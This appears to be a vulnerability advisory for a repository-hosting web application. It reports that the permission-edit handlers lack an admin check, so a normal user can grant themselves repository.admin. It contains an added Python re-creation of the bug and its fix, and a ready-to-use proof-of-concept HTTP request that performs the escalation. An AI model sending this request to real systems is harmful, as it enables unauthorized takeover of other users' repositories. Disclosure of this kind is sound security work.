incorrect_access_control_via_edit_permission.md

File metadata and controls

22 lines (14 loc) · 883 Bytes

This vulnerability allows a normal user to modify the permissions of repositories they should not normally have access to.

By granting themselves `repository.admin`, the user obtains full admin access to the repository.

`edit_permissions_update` and `edit_permissions_revoke` are not decorated with `@HasRepoPermissionAllDecorator('repository.admin')`.

More info here.
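The following is an added illustration, not the project's own code: a minimal re-creation of the missing-authorization bug and its fix. `require_repo_permission` stands in for the `@HasRepoPermissionAllDecorator('repository.admin')` check the page says is missing; the permission levels, the `PERMS` table and the user names are constructed for the example.

```python
# Added illustration (not the project's code): the unguarded handler beside
# the guarded one. The permission model below is constructed for this example.
from functools import wraps

class Forbidden(Exception):
    """Raised when the caller lacks the required repository permission."""

# Permission levels, lowest to highest (constructed ordering).
LEVELS = ["repository.none", "repository.read", "repository.write", "repository.admin"]

# Per-repository permission table: repo -> {user: level}. Constructed sample data.
PERMS = {"not_my_secret_repo": {"owner": "repository.admin", "mallory": "repository.read"}}

def require_repo_permission(level):
    """Stand-in for HasRepoPermissionAllDecorator: caller must hold >= `level` on `repo`."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(user, repo, *args, **kwargs):
            have = PERMS.get(repo, {}).get(user, "repository.none")
            if LEVELS.index(have) < LEVELS.index(level):
                raise Forbidden(f"{user} lacks {level} on {repo}")
            return fn(user, repo, *args, **kwargs)
        return wrapper
    return decorator

def edit_permissions_update_vulnerable(user, repo, member, new_level):
    """Unguarded handler, as the page describes: any caller can change permissions."""
    PERMS.setdefault(repo, {})[member] = new_level
    return PERMS[repo][member]

@require_repo_permission("repository.admin")
def edit_permissions_update_fixed(user, repo, member, new_level):
    """Same handler with the missing check applied: only repo admins may proceed."""
    PERMS.setdefault(repo, {})[member] = new_level
    return PERMS[repo][member]

def demo():
    """Return (level a read-only user reaches via the unguarded handler,
    whether the guarded handler refuses the same request)."""
    granted = edit_permissions_update_vulnerable("mallory", "not_my_secret_repo", "mallory", "repository.admin")
    PERMS["not_my_secret_repo"]["mallory"] = "repository.read"  # reset the sample table
    try:
        edit_permissions_update_fixed("mallory", "not_my_secret_repo", "mallory", "repository.admin")
        refused = False
    except Forbidden:
        refused = True
    return granted, refused

if __name__ == "__main__":
    print(demo())  # ('repository.admin', True)
```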

POC:

Set `your_token_here` and `your_username`.

After this request, `your_username` obtains `repository.admin` access to `not_my_secret_repo`.

```http
POST /not_my_secret_repo/settings/permissions HTTP/1.1
Host: localhost:5000
Content-Length: 225
Connection: close

_method=put&_authentication_token=%your_token_here%&repo_private=False&u_perm_default=repository.admin&perm_new_member_1=repository.admin&perm_new_member_name_1=%your_username%&perm_new_member_type_1=user&save=Save
```